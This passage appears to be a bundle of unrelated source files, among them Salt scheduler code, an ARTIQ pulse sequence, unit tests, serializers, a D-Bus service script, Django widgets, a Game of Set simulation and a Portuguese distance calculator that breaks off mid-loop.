                            __when = self.opts['pillar']['whens'][i]
                            try:
                                when__ = dateutil_parser.parse(__when)
                            except ValueError:
                                log.error('Invalid date string. Ignoring')
                                continue
                        elif ('whens' in self.opts['grains'] and
                                i in self.opts['grains']['whens']):
                            if not isinstance(self.opts['grains']['whens'],
                                              dict):
                                log.error('Grain "whens" must be dict.'
                                          'Ignoring')
                                continue
                            __when = self.opts['grains']['whens'][i]
                            try:
                                when__ = dateutil_parser.parse(__when)
                            except ValueError:
                                log.error('Invalid date string. Ignoring')
                                continue
                        else:
                            try:
                                when__ = dateutil_parser.parse(i)
                            except ValueError:
                                log.error('Invalid date string {0}.'
                                          'Ignoring job {1}.'.format(i, job))
                                continue
                        when = int(time.mktime(when__.timetuple()))
                        if when >= now:
                            _when.append(when)
                    _when.sort()
                    if _when:
                        # Grab the first element
                        # which is the next run time
                        when = _when[0]
                        # If we're switching to the next run in a list
                        # ensure the job can run
                        if '_when' in data and data['_when'] != when:
                            data['_when_run'] = True
                            data['_when'] = when
                        seconds = when - now
                        # scheduled time is in the past
                        if seconds < 0:
                            continue
                        if '_when_run' not in data:
                            data['_when_run'] = True
                        # Backup the run time
                        if '_when' not in data:
                            data['_when'] = when
                        # A new 'when' ensure _when_run is True
                        if when > data['_when']:
                            data['_when'] = when
                            data['_when_run'] = True
                    else:
                        continue
                else:
                    # Single 'when' value: same alias resolution as above.
                    if ('whens' in self.opts['pillar'] and
                            data['when'] in self.opts['pillar']['whens']):
                        if not isinstance(self.opts['pillar']['whens'], dict):
                            log.error('Pillar item "whens" must be dict.'
                                      'Ignoring')
                            continue
                        _when = self.opts['pillar']['whens'][data['when']]
                        try:
                            when__ = dateutil_parser.parse(_when)
                        except ValueError:
                            log.error('Invalid date string. Ignoring')
                            continue
                    elif ('whens' in self.opts['grains'] and
                            data['when'] in self.opts['grains']['whens']):
                        if not isinstance(self.opts['grains']['whens'], dict):
                            log.error('Grain "whens" must be dict. Ignoring')
                            continue
                        _when = self.opts['grains']['whens'][data['when']]
                        try:
                            when__ = dateutil_parser.parse(_when)
                        except ValueError:
                            log.error('Invalid date string. Ignoring')
                            continue
                    else:
                        try:
                            when__ = dateutil_parser.parse(data['when'])
                        except ValueError:
                            log.error('Invalid date string. Ignoring')
                            continue
                    when = int(time.mktime(when__.timetuple()))
                    now = int(time.time())
                    seconds = when - now
                    # scheduled time is in the past
                    if seconds < 0:
                        continue
                    if '_when_run' not in data:
                        data['_when_run'] = True
                    # Backup the run time
                    if '_when' not in data:
                        data['_when'] = when
                    # A new 'when' ensure _when_run is True
                    if when > data['_when']:
                        data['_when'] = when
                        data['_when_run'] = True
            elif 'cron' in data:
                if not _CRON_SUPPORTED:
                    log.error('Missing python-croniter. Ignoring job {0}'.format(job))
                    continue
                now = int(time.mktime(datetime.datetime.now().timetuple()))
                try:
                    cron = int(croniter.croniter(data['cron'], now).get_next())
                except (ValueError, KeyError):
                    log.error('Invalid cron string. Ignoring')
                    continue
                seconds = cron - now
            else:
                # No recognized scheduling option at all; skip the job.
                continue
            # Check if the seconds variable is lower than current lowest
            # loop interval needed. If it is lower than overwrite variable
            # external loops using can then check this variable for how often
            # they need to reschedule themselves
            # Not used with 'when' parameter, causes run away jobs and CPU
            # spikes.
            if 'when' not in data:
                if seconds < self.loop_interval:
                    self.loop_interval = seconds
            run = False
            if 'splay' in data:
                if 'when' in data:
                    log.error('Unable to use "splay" with "when" option at this time. Ignoring.')
                elif 'cron' in data:
                    log.error('Unable to use "splay" with "cron" option at this time. Ignoring.')
                else:
                    # Remember the un-splayed interval so each splay is
                    # applied to the original value, not a previous splay.
                    if '_seconds' not in data:
                        log.debug('The _seconds parameter is missing, '
                                  'most likely the first run or the schedule '
                                  'has been refreshed refresh.')
                        if 'seconds' in data:
                            data['_seconds'] = data['seconds']
                        else:
                            data['_seconds'] = 0
            # Decide whether the job is due on this pass.
            if job in self.intervals:
                if 'when' in data:
                    if seconds == 0:
                        if data['_when_run']:
                            data['_when_run'] = False
                            run = True
                elif 'cron' in data:
                    if seconds == 1:
                        run = True
                else:
                    if now - self.intervals[job] >= seconds:
                        run = True
            else:
                if 'when' in data:
                    if seconds == 0:
                        if data['_when_run']:
                            data['_when_run'] = False
                            run = True
                elif 'cron' in data:
                    if seconds == 1:
                        run = True
                else:
                    # If run_on_start is True, the job will run when the Salt
                    # minion start. If the value is False will run at the next
                    # scheduled run. Default is True.
                    if 'run_on_start' in data:
                        if data['run_on_start']:
                            run = True
                        else:
                            self.intervals[job] = int(time.time())
                    else:
                        run = True
            if run:
                if 'range' in data:
                    if not _RANGE_SUPPORTED:
                        log.error('Missing python-dateutil. Ignoring job {0}'.format(job))
                        continue
                    else:
                        if isinstance(data['range'], dict):
                            try:
                                start = int(time.mktime(dateutil_parser.parse(data['range']['start']).timetuple()))
                            except ValueError:
                                log.error('Invalid date string for start. Ignoring job {0}.'.format(job))
                                continue
                            try:
                                end = int(time.mktime(dateutil_parser.parse(data['range']['end']).timetuple()))
                            except ValueError:
                                log.error('Invalid date string for end. Ignoring job {0}.'.format(job))
                                continue
                            if end > start:
                                # 'invert' flips the window: run only
                                # outside [start, end].
                                if 'invert' in data['range'] and data['range']['invert']:
                                    if now <= start or now >= end:
                                        run = True
                                    else:
                                        run = False
                                else:
                                    if now >= start and now <= end:
                                        run = True
                                    else:
                                        run = False
                            else:
                                log.error('schedule.handle_func: Invalid range, end must be larger than start. \
                                Ignoring job {0}.'.format(job))
                                continue
                        else:
                            log.error('schedule.handle_func: Invalid, range must be specified as a dictionary. \
                            Ignoring job {0}.'.format(job))
                            continue
                if not run:
                    continue
                else:
                    if 'splay' in data:
                        if 'when' in data:
                            log.error('Unable to use "splay" with "when" option at this time. Ignoring.')
                        else:
                            if isinstance(data['splay'], dict):
                                if data['splay']['end'] >= data['splay']['start']:
                                    splay = random.randint(data['splay']['start'], data['splay']['end'])
                                else:
                                    log.error('schedule.handle_func: Invalid Splay, end must be larger than start. \
                                         Ignoring splay.')
                                    splay = None
                            else:
                                # Bare number: splay between 0 and that value.
                                splay = random.randint(0, data['splay'])
                            if splay:
                                log.debug('schedule.handle_func: Adding splay of '
                                          '{0} seconds to next run.'.format(splay))
                                if 'seconds' in data:
                                    data['seconds'] = data['_seconds'] + splay
                                else:
                                    data['seconds'] = 0 + splay
                    log.info('Running scheduled job: {0}'.format(job))
                    if 'jid_include' not in data or data['jid_include']:
                        data['jid_include'] = True
                        log.debug('schedule: This job was scheduled with jid_include, '
                                  'adding to cache (jid_include defaults to True)')
                        if 'maxrunning' in data:
                            log.debug('schedule: This job was scheduled with a max '
                                      'number of {0}'.format(data['maxrunning']))
                        else:
                            log.info('schedule: maxrunning parameter was not specified for '
                                     'job {0}, defaulting to 1.'.format(job))
                            data['maxrunning'] = 1
                    if salt.utils.is_windows():
                        # Temporarily stash our function references.
                        # You can't pickle function references, and pickling is
                        # required when spawning new processes on Windows.
                        functions = self.functions
                        self.functions = {}
                        returners = self.returners
                        self.returners = {}
                    try:
                        # Spawn handle_func in a process (default) or thread.
                        if self.opts.get('multiprocessing', True):
                            thread_cls = multiprocessing.Process
                        else:
                            thread_cls = threading.Thread
                        proc = thread_cls(target=self.handle_func, args=(func, data))
                        proc.start()
                        if self.opts.get('multiprocessing', True):
                            proc.join()
                    finally:
                        # Record the run time even if spawning failed.
                        self.intervals[job] = now
                    if salt.utils.is_windows():
                        # Restore our function references.
                        self.functions = functions
                        self.returners = returners
def clean_proc_dir(opts):
    '''
    Loop through jid files in the minion proc directory (default /var/cache/salt/minion/proc)
    and remove any that refer to processes that no longer exist
    '''
    for basefilename in os.listdir(salt.minion.get_proc_dir(opts['cachedir'])):
        fn_ = os.path.join(salt.minion.get_proc_dir(opts['cachedir']), basefilename)
        with salt.utils.fopen(fn_, 'rb') as fp_:
            job = None
            try:
                job = salt.payload.Serial(opts).load(fp_)
            except Exception:  # It's corrupted
                # Windows cannot delete an open file
                if salt.utils.is_windows():
                    fp_.close()
                # Corrupted record: best-effort removal, then move on to
                # the next file either way.
                try:
                    os.unlink(fn_)
                    continue
                except OSError:
                    continue
            log.debug('schedule.clean_proc_dir: checking job {0} for process '
                      'existence'.format(job))
            if job is not None and 'pid' in job:
                if salt.utils.process.os_is_running(job['pid']):
                    # The process owning this record is still alive; keep it.
                    log.debug('schedule.clean_proc_dir: Cleaning proc dir, '
                              'pid {0} still exists.'.format(job['pid']))
                else:
                    # Windows cannot delete an open file
                    if salt.utils.is_windows():
                        fp_.close()
                    # Maybe the file is already gone
                    try:
                        os.unlink(fn_)
                    except OSError:
                        pass
|
from artiq.experiment import *
class AuxOpticalPumping:
    """Auxiliary optical-pumping pulse sequence (ARTIQ subsequence).

    The class attributes hold parameter-path strings ("Group.name"); the
    surrounding experiment framework presumably substitutes the concrete
    parameter values before ``subsequence`` runs -- TODO confirm against
    the subsequence/parameter loader.
    """
    # 866 nm repump beam settings (shared with Doppler cooling)
    frequency_866="DopplerCooling.doppler_cooling_frequency_866"
    amplitude_866="DopplerCooling.doppler_cooling_amplitude_866"
    att_866="DopplerCooling.doppler_cooling_att_866"
    # 854 nm quench/repump beam settings
    frequency_854="OpticalPumping.optical_pumping_frequency_854"
    amplitude_854="OpticalPumpingAux.amp_854"
    att_854="OpticalPumpingAux.att_854"
    # 729 nm pump beam configuration
    line_selection="OpticalPumpingAux.line_selection"
    channel_729="OpticalPumpingAux.channel_729"
    duration="OpticalPumpingAux.duration"
    # NOTE(review): 'rempump' looks like a typo for 'repump'; left as-is
    # because other code may reference this attribute name.
    rempump_duration="OpticalPumpingContinuous.optical_pumping_continuous_repump_additional"
    amplitude_729="OpticalPumpingAux.amp_729"
    att_729="OpticalPumpingAux.att_729"
    # 729 nm single-pass AOM settings
    sp_amp_729="Excitation_729.single_pass_amplitude"
    sp_att_729="Excitation_729.single_pass_att"
    def subsequence(self):
        """Run one aux optical-pumping pulse: all beams on for `duration`,
        then only the 854/866 repumps for an extra 2x repump duration."""
        o = AuxOpticalPumping  # shorthand for the parameter container
        self.get_729_dds(o.channel_729)
        # Program frequency/amplitude/attenuation for each beam.
        self.dds_866.set(o.frequency_866,
                         amplitude=o.amplitude_866)
        self.dds_866.set_att(o.att_866)
        self.dds_854.set(o.frequency_854,
                         amplitude=o.amplitude_854)
        self.dds_854.set_att(o.att_854)
        freq_729 = self.calc_frequency(
            o.line_selection,
            dds=o.channel_729
        )
        self.dds_729.set(freq_729,
                         amplitude=o.amplitude_729)
        self.dds_729.set_att(o.att_729)
        # Single-pass AOM runs at 80 MHz plus the per-channel offset.
        sp_freq_729 = 80*MHz + self.get_offset_frequency(o.channel_729)
        self.dds_729_SP.set(sp_freq_729, amplitude=o.sp_amp_729)
        self.dds_729_SP.set_att(o.sp_att_729)
        # Open all beams simultaneously.
        with parallel:
            self.dds_866.sw.on()
            self.dds_854.sw.on()
            self.dds_729.sw.on()
            self.dds_729_SP.sw.on()
        delay(o.duration)
        # Close the 729 paths first; keep repumps on a while longer.
        with parallel:
            self.dds_729.sw.off()
            self.dds_729_SP.sw.off()
        delay(2 * o.rempump_duration)
        with parallel:
            self.dds_854.sw.off()
            self.dds_866.sw.off()
|
import csv
# ------- Authenticator
# Compare a user-supplied code against the hex codes stored in hex.csv.
entry = False  # Set True once the entered code matches a stored one
user_input = []
user_input.append(input("Code: "))
print("")
# --- Dataset Pull: second column of every non-empty CSV row
data = []
with open('hex.csv', 'r') as codefile:
    for row in csv.reader(codefile, delimiter=','):
        if row != []:
            data.append(row[1])
# --- Comparing
for code in data:
    if code == user_input[0]:
        print("{} {}".format(code, "Approved"))
        entry = True
    else:
        print(code)
print("\nEntry:", entry)
|
import FWCore.ParameterSet.Config as cms
# EDProducer turning emulated L1 EG clusters into PF clusters for the
# L1 correlator chain.
pfClustersFromL1EGClusters = cms.EDProducer("PFClusterProducerFromL1EGClusters",
    corrector = cms.string(''),  # empty: no energy corrector applied
    etMin = cms.double(0.5),  # minimum cluster ET threshold
    # Eta-binned resolution parameterization (offset/scale per etaBin).
    resol = cms.PSet(
        etaBins = cms.vdouble(0.7, 1.2, 1.6),
        kind = cms.string('calo'),
        offset = cms.vdouble(0.838, 0.924, 1.101),
        scale = cms.vdouble(0.012, 0.017, 0.018)
    ),
    src = cms.InputTag("L1EGammaClusterEmuProducer")
)
|
from unittest import TestCase
from seqs.Permutations import PlainChanges, SteinhausJohnsonTrotter, Involutions
class PermutationTest(TestCase):
    """Unit tests for the permutation-sequence generators in seqs.Permutations."""
    def test_Changes(self):
        """Do we get the expected sequence of changes for n=3?"""
        self.assertEqual(list(PlainChanges(3)), [1, 0, 1, 0, 1])
    def test_Lengths(self):
        """Are the lengths of the generated sequences factorial?"""
        f = 1
        for i in range(2, 7):
            f *= i  # f == i! on each iteration
            self.assertEqual(f, len(list(SteinhausJohnsonTrotter(i))))
    def test_Distinct(self):
        """Are all permutations in the sequence different from each other?"""
        for i in range(2, 7):
            s = set()
            n = 0
            for x in SteinhausJohnsonTrotter(i):
                s.add(tuple(x))
                n += 1
            self.assertEqual(len(s), n)
    def test_Adjacent(self):
        """Do consecutive permutations in the sequence differ by a swap?"""
        for i in range(2, 7):
            last = None
            for p in SteinhausJohnsonTrotter(i):
                # Explicit None check (was `if last:`) so an empty first
                # permutation could not be silently skipped.
                if last is not None:
                    diffs = [j for j in range(i) if p[j] != last[j]]
                    self.assertEqual(len(diffs), 2)
                    self.assertEqual(p[diffs[0]], last[diffs[1]])
                    self.assertEqual(p[diffs[1]], last[diffs[0]])
                last = list(p)
    def test_ListInput(self):
        """If given a list as input, is it the first output?"""
        for L in ([1, 3, 5, 7], list("zyx"), [], [[]], list(range(20))):
            self.assertEqual(L, next(SteinhausJohnsonTrotter(L)))
    def test_Involutions(self):
        """Are these involutions and do we have the right number of them?"""
        # Counts of involutions of n elements: OEIS A000085 ("telephone numbers").
        telephone = [1, 1, 2, 4, 10, 26, 76, 232, 764]
        for n in range(len(telephone)):
            count = 0
            # Renamed from `sorted`, which shadowed the builtin of that name.
            identity = list(range(n))
            invs = set()
            for p in Involutions(n):
                # Applying p to itself must yield the identity permutation.
                self.assertEqual([p[i] for i in p], identity)
                invs.add(tuple(p))
                count += 1
            self.assertEqual(len(invs), count)
            self.assertEqual(len(invs), telephone[n])
|
from pyaedt.application.Analysis import Analysis
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modeler.Model2D import ModelerRMxprt
from pyaedt.modules.PostProcessor import CircuitPostProcessor
class FieldAnalysisRMxprt(Analysis):
    """Manages RMXprt field analysis setup. (To be implemented.)
    This class is automatically initialized by an application call (like HFSS,
    Q3D...). Refer to the application function for inputs definition.
    Parameters
    ----------
    Returns
    -------
    """
    def __init__(
        self,
        application,
        projectname,
        designname,
        solution_type,
        setup_name=None,
        specified_version=None,
        non_graphical=False,
        new_desktop_session=False,
        close_on_exit=False,
        student_version=False,
    ):
        # Delegate project/design/desktop bookkeeping to the base Analysis.
        Analysis.__init__(
            self,
            application,
            projectname,
            designname,
            solution_type,
            setup_name,
            specified_version,
            non_graphical,
            new_desktop_session,
            close_on_exit,
            student_version,
        )
        # RMxprt designs use the 2D modeler and the circuit post-processor.
        self._modeler = ModelerRMxprt(self)
        self._post = CircuitPostProcessor(self)
    @property
    def modeler(self):
        """Modeler.
        Returns
        -------
        :class:`pyaedt.modules.Modeler`
        """
        return self._modeler
    @pyaedt_function_handler()
    def disable_modelcreation(self, solution_type=None):
        """Set the design to RMxprt solution mode, disabling Maxwell model creation.
        Parameters
        ----------
        solution_type :
            Type of the solution. The default is ``None``.
        Returns
        -------
        bool
            ``True`` when successful, ``False`` when failed.
        """
        self._design_type = "RMxprtSolution"
        self.solution_type = solution_type
        return True
    @pyaedt_function_handler()
    def enable_modelcreation(self, solution_type=None):
        """Enable model creation for the Maxwell model wizard.
        Parameters
        ----------
        solution_type : str
            Type of the solution. The default is ``None``.
        Returns
        -------
        bool
            ``True`` when successful, ``False`` when failed.
        """
        self._design_type = "ModelCreation"
        self.solution_type = solution_type
        return True
    @pyaedt_function_handler()
    def _check_solution_consistency(self):
        """Check that the active design's solution type matches ours."""
        if self.design_solutions:
            return self._odesign.GetSolutionType() == self.design_solutions._solution_type
        else:
            # No expected solution recorded; nothing to contradict.
            return True
    @pyaedt_function_handler()
    def _check_design_consistency(self):
        """Check design consistency: the open design must be an RMxprt design
        whose solution type matches."""
        consistent = False
        destype = self._odesign.GetDesignType()
        if destype == "RMxprt":
            consistent = self._check_solution_consistency()
        return consistent
|
import struct
from enum import Enum
from io import BufferedIOBase
from typing import Any, Optional, Union
from binary.serializers import BaseSerializer
from binary.struct_consts import (
ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG, ENDIAN_NETWORK, INT8_SIGNED,
INT8_UNSIGNED, INT16_SIGNED, INT16_UNSIGNED, INT32_SIGNED, INT32_UNSIGNED,
INT64_SIGNED, INT64_UNSIGNED, FLOAT, DOUBLE
)
# Public API: fixed-width integer/float serializers plus C-style aliases.
__all__ = ['Endian', 'Int8', 'UInt8', 'Int16', 'UInt16', 'Int32', 'UInt32',
           'Int64', 'UInt64', 'Float', 'Double', 'Byte', 'UByte', 'Short',
           'UShort', 'Int', 'UInt', 'Long', 'ULong']
class Endian(Enum):
    """Byte-order selectors; values are struct-module prefix characters."""
    Native = ENDIAN_NATIVE
    Little = ENDIAN_LITTLE
    Big = ENDIAN_BIG
    Network = ENDIAN_NETWORK
class _StructSerializer(BaseSerializer):
    """Base for fixed-size serializers backed by a compiled struct.Struct."""
    # Subclasses must override with a struct format character (e.g. 'b', 'I').
    __struct_format__ = NotImplemented  # type: Union[str, NotImplemented]
    def __init__(self):
        # type: () -> None
        """Compile the struct once; raise if no format was declared."""
        if self.__struct_format__ is NotImplemented:
            raise NotImplementedError('Serializer has no __struct_format__ set.')
        # NOTE(review): byte order is hard-coded to little-endian here; the
        # Endian enum above is never consulted -- confirm this is intended.
        self.compiled_struct = struct.Struct(ENDIAN_LITTLE + self.__struct_format__)
    def to_bytes(self, obj):
        # type: (Any) -> bytes
        """Pack a single value into its fixed-size binary representation."""
        return self.compiled_struct.pack(obj)
    def from_bytes(self, bytes_stream):
        # type: (BufferedIOBase) -> Any
        # Reads exactly `size` bytes from the stream and unpacks them.
        # NOTE(review): struct.unpack_from returns a tuple even for a single
        # field, so this is not the exact inverse of to_bytes -- verify that
        # callers expect a tuple.
        size = self.compiled_struct.size
        return self.compiled_struct.unpack_from(bytes_stream.read(size))
    def try_get_size(self, obj=None):
        # type: (Any) -> Optional[int]
        """Size is fixed by the struct format, independent of ``obj``."""
        return self.compiled_struct.size
# Concrete serializers: each fixes __struct_format__ to one struct code.
class Int8(_StructSerializer):
    __struct_format__ = INT8_SIGNED
class UInt8(_StructSerializer):
    __struct_format__ = INT8_UNSIGNED
class Int16(_StructSerializer):
    __struct_format__ = INT16_SIGNED
class UInt16(_StructSerializer):
    __struct_format__ = INT16_UNSIGNED
class Int32(_StructSerializer):
    __struct_format__ = INT32_SIGNED
class UInt32(_StructSerializer):
    __struct_format__ = INT32_UNSIGNED
class Int64(_StructSerializer):
    __struct_format__ = INT64_SIGNED
class UInt64(_StructSerializer):
    __struct_format__ = INT64_UNSIGNED
class Float(_StructSerializer):
    __struct_format__ = FLOAT
class Double(_StructSerializer):
    __struct_format__ = DOUBLE
# C-style aliases for the fixed-width serializers above.
Byte = Int8
UByte = UInt8
Short = Int16
UShort = UInt16
Int = Int32
UInt = UInt32
Long = Int64
ULong = UInt64
|
from dbus_next.aio import MessageBus
from dbus_next import BusType
import asyncio
async def main():
    """Stop the kodi systemd unit over D-Bus and print its state changes."""
    # The typical path of systemd service on system DBUS
    DBUS_SERVICE_SYSTEMD = 'org.freedesktop.systemd1'
    # Path of kodi unit within systemd DBUS service
    DBUS_OBJECT_UNIT_KODI = '/org/freedesktop/systemd1/unit/kodi_2eservice'
    # systemd.unit interface of DBUS systemd.unit objects
    DBUS_INTERFACE_UNIT = 'org.freedesktop.systemd1.Unit'
    # Properties interface of DBUS (available for all objects)
    # (the two comments above were previously swapped)
    DBUS_INTERFACE_PROPERTIES = 'org.freedesktop.DBus.Properties'
    bus = await MessageBus(bus_type=BusType.SYSTEM).connect()
    # the introspection xml would normally be included in your project, but
    # this is convenient for development
    introspection = await bus.introspect(DBUS_SERVICE_SYSTEMD, DBUS_OBJECT_UNIT_KODI)
    obj = bus.get_proxy_object(DBUS_SERVICE_SYSTEMD, DBUS_OBJECT_UNIT_KODI, introspection)
    kodi = obj.get_interface(DBUS_INTERFACE_UNIT)
    properties = obj.get_interface(DBUS_INTERFACE_PROPERTIES)
    # Get current unit state
    current_state = await properties.call_get(DBUS_INTERFACE_UNIT, 'ActiveState')
    print(current_state.value)
    # listen to properties changed signal.
    # Of major interest is the property 'ActiveState'
    def on_properties_changed(interface_name, changed_properties, invalidated_properties):
        try:
            print(changed_properties['ActiveState'].value)
        except KeyError:
            # Some property other than ActiveState changed; ignore it.
            pass
    properties.on_properties_changed(on_properties_changed)
    # call methods on the interface (this causes kodi to stop)
    await kodi.call_stop('fail')
    # Wait for a never completing future - forever
    await asyncio.get_running_loop().create_future()
# asyncio.run() (Python 3.7+) creates and tears down the event loop itself,
# replacing the deprecated get_event_loop()/run_until_complete() pattern.
asyncio.run(main())
|
from django.forms import CheckboxInput, Textarea
class Toggle(CheckboxInput):
    """Checkbox rendered as a toggle switch via a custom template."""
    template_name = 'django_modals/widgets/toggle.html'
    # Layout hints, presumably consumed by the crispy-forms/modal rendering
    # code elsewhere in django_modals -- confirm against the form builder.
    crispy_kwargs = {'template': 'django_modals/fields/label_checkbox.html', 'field_class': 'col-6 input-group-sm'}
class TinyMCE(Textarea):
    """Textarea rendered as a TinyMCE rich-text editor via a custom template."""
    template_name = 'django_modals/widgets/tinymce.html'
    # Layout hints, presumably consumed by the crispy-forms/modal rendering
    # code elsewhere in django_modals -- confirm against the form builder.
    crispy_kwargs = {'label_class': 'col-3 col-form-label-sm', 'field_class': 'col-12 input-group-sm'}
|
import random
import collections
import itertools
"""
Game of Set (Peter Norvig 2010-2015)
How often do sets appear when we deal an array of cards?
How often in the course of playing out the game?
Here are the data types we will use:
card: A string, such as '3R=0', meaning "three red striped ovals".
deck: A list of cards, initially of length 81.
layout: A list of cards, initially of length 12.
set: A tuple of 3 cards.
Tallies: A dict: {12: {True: 33, False: 1}} means a layout of size 12
tallied 33 sets and 1 non-set.
"""
#### Cards, dealing cards, and defining the notion of sets.

# Every card is one choice of number, color, shade and symbol: 3^4 = 81 cards.
CARDS = [''.join(features)
         for features in itertools.product('123', 'RGP', '@O=', '0SD')]
def deal(n, deck):
    "Deal n cards from the deck."
    dealt = []
    for _ in range(n):
        dealt.append(deck.pop())
    return dealt
def is_set(cards):
    "Are these 3 cards a set? No if any feature has 2 values."
    return all(len({card[f] for card in cards}) != 2 for f in range(4))
def find_set(layout):
    "Return a set found from this layout, if there is one."
    candidates = (trio for trio in itertools.combinations(layout, 3)
                  if is_set(trio))
    return next(candidates, ())
#### Tallying set:no-set ratio

def Tallies():
    "A data structure to keep track, for each size, the number of sets and no-sets."
    def _fresh_counts():
        return {True: 0, False: 0}
    return collections.defaultdict(_fresh_counts)
def tally(tallies, layout):
    "Record that a set was found or not found in a layout of given size; return the set."
    found = find_set(layout)
    size = len(layout)
    tallies[size][bool(found)] += 1
    return found
#### Three experiments

def tally_initial_layout(N, sizes=(12, 15)):
    """Record tallies for N initial deals.

    For each of N shuffles, tally whether a set exists in the first
    `size` cards, for every size in `sizes`.  Returns the Tallies dict.
    """
    tallies = Tallies()
    deck = list(CARDS)
    # Loop variable renamed from `deal`, which shadowed the deal() function.
    for _ in range(N):
        random.shuffle(deck)
        for size in sizes:
            tally(tallies, deck[:size])
    return tallies
def tally_initial_layout_no_prior_sets(N, sizes=(12, 15)):
    """Simulate N initial deals for each size, keeping tallies for Sets and NoSets,
    but only when there was no set with 3 fewer cards."""
    tallies = Tallies()
    deck = list(CARDS)
    # Loop variable renamed from `deal`, which shadowed the deal() function.
    for _ in range(N):
        random.shuffle(deck)
        for size in sizes:
            # Only tally layouts that became interesting with the last 3 cards.
            if not find_set(deck[:size-3]):
                tally(tallies, deck[:size])
    return tallies
def tally_game_play(N):
    "Record tallies for the play of N complete games."
    tallies = Tallies()
    for _ in range(N):
        deck = list(CARDS)
        random.shuffle(deck)
        layout = deal(12, deck)
        while deck:
            found = tally(tallies, layout)
            # Pick up the cards in the set, if any
            for card in found:
                layout.remove(card)
            # Deal new cards
            if len(layout) < 12 or not found:
                layout += deal(3, deck)
    return tallies
def experiments(N):
    "Run all three experiments and print their tables, after the booklet's claim."
    booklet_claim = {12: [1, 33], 15: [1, 2500]}
    show(booklet_claim, 'the instruction booklet')
    show(tally_initial_layout(N), 'initial layout')
    # Full games are slower, so run fewer of them.
    show(tally_game_play(N // 25), 'game play')
    show(tally_initial_layout_no_prior_sets(N),
         'initial layout, but no sets before dealing last 3 cards')
def show(tallies, label):
    "Print out the counts."
    print()
    print('Size | Sets | NoSets | Set:NoSet ratio for', label)
    print('-----+--------+--------+----------------')
    for size in sorted(tallies):
        yes = tallies[size][True]
        no = tallies[size][False]
        if no == 0:
            ratio = 'inft'
        else:
            ratio = int(round(float(yes) / no))
        print('{:4d} |{:7,d} |{:7,d} | {:4}:1'.format(size, yes, no, ratio))
def test():
    "Sanity checks for the card deck, set detection, and set search."
    assert len(CARDS) == 81 == len(set(CARDS))  # 81 distinct cards
    assert is_set(('3R=O', '2R=S', '1R=D'))
    assert not is_set(('3R=0', '2R=S', '1R@D'))
    assert find_set(['1PO0', '2G=D', '3R=0', '2R=S', '1R=D']) == ('3R=0', '2R=S', '1R=D')
    assert not find_set(['1PO0', '2G=D', '3R=0', '2R=S', '1R@D'])
    # A 15-card layout (from a photo of a real game) with no set in it.
    photo = '2P=0 3P=D 2R=0 3GO0 2POD 3R@D 2RO0 2ROS 1P@S 2P@0 3ROS 2GOD 2P@D 1GOD 3GOS'.split()
    assert not find_set(photo)
    assert set(itertools.combinations([1, 2, 3, 4], 3)) == {(1, 2, 3), (1, 2, 4), (1, 3, 4), (2, 3, 4)}
    print('All tests pass.')
# Guarded so importing this module no longer kicks off the (slow) simulations.
if __name__ == '__main__':
    test()
    experiments(100000)
|
import math
def soma_distancias(lista_das_coordenadas, referencia):
    """Sum of Euclidean distances from each 3D point to `referencia`, rounded to 2 places."""
    soma = 0
    for ponto in lista_das_coordenadas:
        dx = referencia[0] - ponto[0]
        dy = referencia[1] - ponto[1]
        dz = referencia[2] - ponto[2]
        soma += math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)
    return round(soma, 2)
def deslocamento(lista_das_coordenadas, qtd_ciclos, diferencial_deslocamento, referencia_convertida):
    """Shift the points over `qtd_ciclos` cycles and total the distances to the reference.

    Per cycle i, each point moves by i * diferencial_deslocamento:
    x and y decrease, z increases.  Returns (per-cycle distance sums,
    per-cycle shifted point lists).
    """
    lista_coordenadas_depois_dos_deslocamentos = []
    vetor_soma_distancias_deslocadas = []
    for ciclo in range(1, qtd_ciclos + 1):
        coordenadas_pos_deslocamento = []
        for ponto in lista_das_coordenadas:
            novo_ponto = [round(ponto[0] - (diferencial_deslocamento * ciclo), 2),
                          round(ponto[1] - (diferencial_deslocamento * ciclo), 2),
                          round(ponto[2] + (diferencial_deslocamento * ciclo), 2)]
            coordenadas_pos_deslocamento.append(novo_ponto)
        lista_coordenadas_depois_dos_deslocamentos.append(coordenadas_pos_deslocamento)
        soma = soma_distancias(coordenadas_pos_deslocamento, referencia_convertida)
        vetor_soma_distancias_deslocadas.append(round(soma, 2))
    return vetor_soma_distancias_deslocadas, lista_coordenadas_depois_dos_deslocamentos
def imprimir_coordenadas_iniciais(lista_coordenadas):
    """Print the original input points, one "(x,y,z)" per line."""
    print("Pontos Originais: ")
    for ponto in lista_coordenadas:
        print("    " + "(" + str(ponto[0]) + "," + str(ponto[1]) + "," + str(ponto[2]) + ")")
def imprimir_coordenadas_deslocadas(lista_coordenadas, lista_coordenadas_deslocadas, qtd_ciclos, diferencial_deslocamento, referencia, vetor_soma_distancias_deslocadas):
    """Print, for each cycle, the displaced points followed by the sum of
    their distances to the reference point.

    lista_coordenadas: original points (only its length is used here).
    lista_coordenadas_deslocadas: per-cycle lists of displaced points.
    referencia: the reference point to display.
    vetor_soma_distancias_deslocadas: per-cycle distance sums.
    """
    for i in range(1, qtd_ciclos + 1):
        print("Listagem de Pontos no Ciclo " + str(i) + ", Delta de deslocamento " + str(diferencial_deslocamento) + ": ")
        for j in range(0, len(lista_coordenadas)):
            print("    " + "(" + str(lista_coordenadas_deslocadas[i-1][j][0]) + "," + str(lista_coordenadas_deslocadas[i-1][j][1]) + "," + str(lista_coordenadas_deslocadas[i-1][j][2]) + ")")
        # BUG FIX: use the 'referencia' parameter; the original referenced the
        # module-level global 'referencia_convertida' instead, which broke the
        # function whenever the global was absent or differed from the argument.
        print("Soma das distâncias para o ponto " + str(referencia) + ": ", str(vetor_soma_distancias_deslocadas[i-1]))
        print()
#-----------------------------------CORPO DO PROGRAMA------------------------------------------------------------
# Interactive driver: reads 3-D points (one per line, "x y z") until a blank
# line, then a reference point; prints distance sums before and after the
# requested cyclic displacements.
# NOTE(review): the inner 'for i in range(0, 3)' loops reuse the outer
# while-loop variable 'i'; the while condition stays true only because i
# ends each pass at 2 (>= 1). Fragile but functional.
i=1
vetor_coordenada=[]
lista_das_coordenadas = []
referencia_aux = []
referencia_convertida=[]
vetor_distancias_deslocadas = []
lista_coordenadas_depois_dos_deslocamentos = []
while i >= 1:
    coordenada = input("Digite a coordenada: ")
    if coordenada == "":
        # Blank input ends point entry; read the reference point next.
        ponto_de_referencia = input("Digite o ponto de referencia: ")
